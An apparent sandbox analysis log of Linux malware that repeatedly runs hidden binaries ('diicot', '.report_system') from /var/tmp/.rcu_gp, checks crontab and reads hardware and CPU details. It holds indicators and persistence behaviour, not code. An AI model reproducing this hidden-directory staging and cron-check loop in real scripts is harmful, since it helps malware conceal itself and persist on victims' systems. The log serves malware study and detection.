  PID:1549
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1550
- /bin/grep
  grep -q .main
  2⤵
  PID:1553
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1552
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1554
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1560
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1561
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1562
- /bin/grep
  grep -q .main
  2⤵
  PID:1565
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1564
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1566
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1572
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1573
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1574
- /bin/grep
  grep -q .main
  2⤵
  PID:1577
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1576
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1578
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1584
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1585
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1586
- /bin/grep
  grep -q .main
  2⤵
  PID:1589
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1588
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1590
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1596
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1597
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1598
- /bin/grep
  grep -q .main
  2⤵
  PID:1601
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1600
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1602
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1608
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1609
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1610
- /bin/grep
  grep -q .main
  2⤵
  PID:1613
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1612
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1614
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1622
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1623
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1624
- /bin/grep
  grep -q .main
  2⤵
  PID:1627
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1626
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1628
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1634
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1635
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1636
- /bin/grep
  grep -q .main
  2⤵
  PID:1639
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1638
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1640
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1646
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1647
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1648
- /bin/grep
  grep -q .main
  2⤵
  PID:1651
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1650
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1652
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1658
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1659
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1660
- /bin/grep
  grep -q .main
  2⤵
  PID:1663
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1662
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1664
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1670
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1671
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1672
- /bin/grep
  grep -q .main
  2⤵
  PID:1675
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1674
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1676
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1682
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1683
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1684
- /bin/grep
  grep -q .main
  2⤵
  PID:1687
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1686
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1688
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1694
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1695
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1696
- /bin/grep
  grep -q .main
  2⤵
  PID:1699
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1698
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1700
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1706
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1707
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1708
- /bin/grep
  grep -q .main
  2⤵
  PID:1711
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1710
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1712
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1718
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1719
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1720
- /bin/grep
  grep -q .main
  2⤵
  PID:1723
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1722
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1724
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1730
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1731
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1732
- /bin/grep
  grep -q .main
  2⤵
  PID:1735
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1734
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1736
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1742
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1743
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1744
- /bin/grep
  grep -q .main
  2⤵
  PID:1747
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1746
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1748
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1754
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1755
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1756
- /bin/grep
  grep -q .main
  2⤵
  PID:1759
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1758
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1760
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1766
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1767
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1768
- /bin/grep
  grep -q .main
  2⤵
  PID:1771
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1770
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1772
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1778
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1779
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1780
- /bin/grep
  grep -q .main
  2⤵
  PID:1783
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1782
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1784
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1790
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1791
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1792
- /bin/grep
  grep -q .main
  2⤵
  PID:1795
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1794
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1796
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1810
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1811
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1812
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1814
- /bin/grep
  grep -q .main
  2⤵
  PID:1815
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1816
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1826
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1827
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1828
- /bin/grep
  grep -q .main
  2⤵
  PID:1831
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1830
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1832
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1838
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1839
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1840
- /bin/grep
  grep -q .main
  2⤵
  PID:1843
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1842
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1844
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1850
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1851
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1852
- /bin/grep
  grep -q .main
  2⤵
  PID:1855
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1854
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1856
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1862
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1863
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1864
- /bin/grep
  grep -q .main
  2⤵
  PID:1867
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1866
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1868
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1874
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1875
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1876
- /bin/grep
  grep -q .main
  2⤵
  PID:1879
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1878
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1880
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1886
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1887
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1888
- /bin/grep
  grep -q .main
  2⤵
  PID:1891
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1890
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1892
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1898
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1899
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1900
- /bin/grep
  grep -q .main
  2⤵
  PID:1903
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1902
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1904
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1910
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1911
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1912
- /bin/grep
  grep -q .main
  2⤵
  PID:1915
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1914
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1916
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1922
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:1923
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1924
- /bin/grep
  grep -q .main
  2⤵
  PID:1927
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1926
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1928
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1934
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:1935
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1936
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1938
- /bin/grep
  grep -q .main
  2⤵
  PID:1939
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1940
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1946
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:1947
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1948
- /bin/grep
  grep -q .main
  2⤵
  PID:1951
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1950
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1952
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1958
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:1959
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1960
- /bin/grep
  grep -q .main
  2⤵
  PID:1963
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1962
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1964
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1970
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:1971
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1972
- /bin/grep
  grep -q .main
  2⤵
  PID:1975
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1974
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1976
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1982
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:1983
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1984
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1986
- /bin/grep
  grep -q .main
  2⤵
  PID:1987
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1988
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1994
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:1995
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1996
- /bin/grep
  grep -q .main
  2⤵
  PID:1999
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1998
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2000
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2006
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2007
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2008
- /bin/grep
  grep -q .main
  2⤵
  PID:2011
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2010
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2012
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2018
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2019
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2020
- /bin/grep
  grep -q .main
  2⤵
  PID:2023
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2022
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2024
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2030
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2031
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:2032
- /bin/grep
  grep -q .main
  2⤵
  PID:2035
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2034
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2036
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2042
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2043
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2044
- /bin/grep
  grep -q .main
  2⤵
  PID:2047
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2046
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2048
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2054
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2055
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2056
- /bin/grep
  grep -q .main
  2⤵
  PID:2059
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2058
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2060
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2066
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2067
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:2068
- /bin/grep
  grep -q .main
  2⤵
  PID:2071
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2070
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2072
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2078
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2079
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2080
- /bin/grep
  grep -q .main
  2⤵
  PID:2083
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2082
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2084
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2090
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2091
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2092
- /bin/grep
  grep -q .main
  2⤵
  PID:2095
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2094
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2096
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2114
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2115
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:2116
- /bin/grep
  grep -q .main
  2⤵
  PID:2119
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2118
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2120
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2126
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2127
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2128
- /bin/grep
  grep -q .main
  2⤵
  PID:2131
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2130
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2132
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2138
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2139
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2140
- /bin/grep
  grep -q .main
  2⤵
  PID:2143
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2142
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2144
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2150
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2151
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:2152
- /bin/grep
  grep -q .main
  2⤵
  PID:2155
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2154
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2156
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2162
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2163
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2164
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2166
- /bin/grep
  grep -q .main
  2⤵
  PID:2167
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2168
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2174
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2175
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2176
- /bin/grep
  grep -q .main
  2⤵
  PID:2179
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2178
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2180
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2186
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2187
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2188
- /bin/grep
  grep -q .main
  2⤵
  PID:2191
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2190
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2192
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2198
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:2199
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2200
- /bin/grep
  grep -q .main
  2⤵
  PID:2203
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2202
- /bin/sleep
  sleep 2.5
  2⤵
  PID:2204

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1527

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1539

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1551

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1563

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1575

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1587

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1599

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1611

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1625

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1637

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1649

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
PID:1661

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1673

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
PID:1685

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
PID:1697

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1709

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
PID:1721

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1733

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1745

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
